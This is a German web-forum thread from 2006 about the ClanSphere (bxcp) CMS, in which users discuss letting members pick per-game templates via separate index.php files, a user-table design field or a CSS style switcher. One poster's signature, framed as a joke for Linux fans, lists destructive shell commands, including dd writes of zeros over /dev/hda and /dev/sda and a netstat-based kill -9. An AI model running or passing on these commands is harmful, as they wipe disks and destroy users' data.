Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 7
Seite [1]
Nachtelb


Wannabe poster





Beiträge: 37
# Thema - 02.10.2006 um 14:50 Uhr
Hallo zusammen.

Beschäftige mich jetzt schon seit einiger Zeit mit bxcp und bin gerade dabei unsere neue HP zu bauen. Bin absolut begeistert von den Möglichkeiten, die man mit bxcp hat. Hier wird wirklich alles geboten, was man als Clan braucht. Vorab schon mal ein Lob an die Entwickler!

Ich habe jetzt ein spezielles Problem, zu dem ich auch im alten Forum keine Lösung finden konnte. Unser Clan ist (wird) ein Multigaming Clan und ich würde es gerne so anlegen, dass jeder User sein Template passend zum Game, das er/sie spielt, selbst auswählen kann. In der Template Liste sollen dann nur noch die "Game-Templates" stehen.

Momentan kann man aber die Templates nur über das "System" auswählen. Und auf das "System" sollte nicht jedes Mitglied Zugriff haben. Gibt es dafür vielleicht eine Lösung?
Inaktiv
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 1 - 02.10.2006 um 14:53 Uhr
Es gibt die Möglichkeit, so wie hier, es per verschiedene index.php Dateien zu steuern.

In der jeweiligen PHP Datei kannst du dann das Template bestimmen. Wird halt nicht vom user bestimmt, sondern von dir, oben ein Button "Game CS, Game BF oä." ähnlich den Buttons "Development" "Modules" etc.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 2 - 02.10.2006 um 15:31 Uhr
Dabei wird aber die Einstellung nicht gespeichert. D.h. der User muss jedes Mal wenn er auf die Homepage geht, sein "Skin" aufs neue auswählen. Meiner Meinung nach ist dies aber nicht der Sinn der Sache


------------------

ONLINE PORTFOLIO

Inaktiv
|
teMpLa


Rock the board




Herkunft: Wiesbaden
Beiträge: 49
# Antwort: 3 - 02.10.2006 um 17:06 Uhr
Jo die Idee ist eine andere...
Spontane Lösung dazu hab ich gerade nicht, da die Einstellungen im System komplett alle betrifft. Ansonsten würde ja Access.php reichen um das einzustellen, aber das is ja auch net der sinn...
Das ganze muss dann mit in die Cookies oder sonst irgendwie gespeichert für die einzelnen User.

Finde die ganze Idee geil!

Struktur vll?^^

- Option für Admins, ob es erlaubt ist das Temp zu wechseln.
- Auswahl für User genauso wie das System ding.
- Einzelne Speicherung für jeden.
- Accessauswahl wer Template wechseln darf.


------------------

Weltmeisterschaft 2010 in Afrika, wir machens!!!

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 02.10.2006 um 17:09 Uhr
Man müsste die Datenbank bzw die Usertabelle so erweitern das dort meinetwegen: 'css' als Design definiert ist.

Ist ein User nicht eingeloggt, so ist das Defaulttemplate aktiviert.

Logt sich ein User ein, wird in der DB nach dem Einztag für das Design gesucht welches er angegeben hat.

Nach dem Login wird das Design automatisch zu dem 'Userdesign' gewchselt.

Ich nehme an so meinst du das oder?


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Godlike


King for a day




Herkunft: Offenbach
Beiträge: 230
# Antwort: 5 - 02.10.2006 um 18:56 Uhr
jo denke ich auch das er es so meint aber Gleichzeitig mal ne geile idee ^^


------------------


Der schlimmste Fehler, den man im Leben machen kann, ist ständig zu befürchten, dass man einen macht.

Inaktiv
|
Nachtelb
Thread-Ersteller


Wannabe poster





Beiträge: 37
# Antwort: 6 - 02.10.2006 um 23:26 Uhr
Würde das Thema gerne nochmal aufgreifen und habe zwei Fragen:

Wie genau funktioniert das mit den Styles per php, so wie ihr das hier auf der HP gelöst habt? Ich bin nicht so der php-Held, vielleicht könnte das jemand mal kurz beschreiben?

Ist es generell möglich das bxpc.css auch umzubenennen (z.B. wc3.css, gw.css), wenn man es in der index.htm entsprechend auch verlinkt? Dann gäbe es nämlich auch die Möglichkeit einen Style-Switcher mit verschiedenen *.css Files einzubauen, so wie er hier beschrieben wird: Styleswitcher


Zuletzt editiert von Gabriel am 31.10.2006 um 09:28 Uhr (1x Editiert)
Inaktiv
|
jgN__


King for a day




Herkunft: Linz
Beiträge: 346
# Antwort: 7 - 02.11.2006 um 14:28 Uhr
sorry wrong post

der post kann gelöscht werden...war an der falschen stelle

sorry for spam


------------------
ClanSphere - Makes your website a playmate, just dress her


Zuletzt editiert von dEv!Ls butt am 02.11.2006 um 14:30 Uhr (2x Editiert)
Inaktiv
|
Antworten: 7
Seite [1]


Sie müssen sich registrieren, um zu antworten.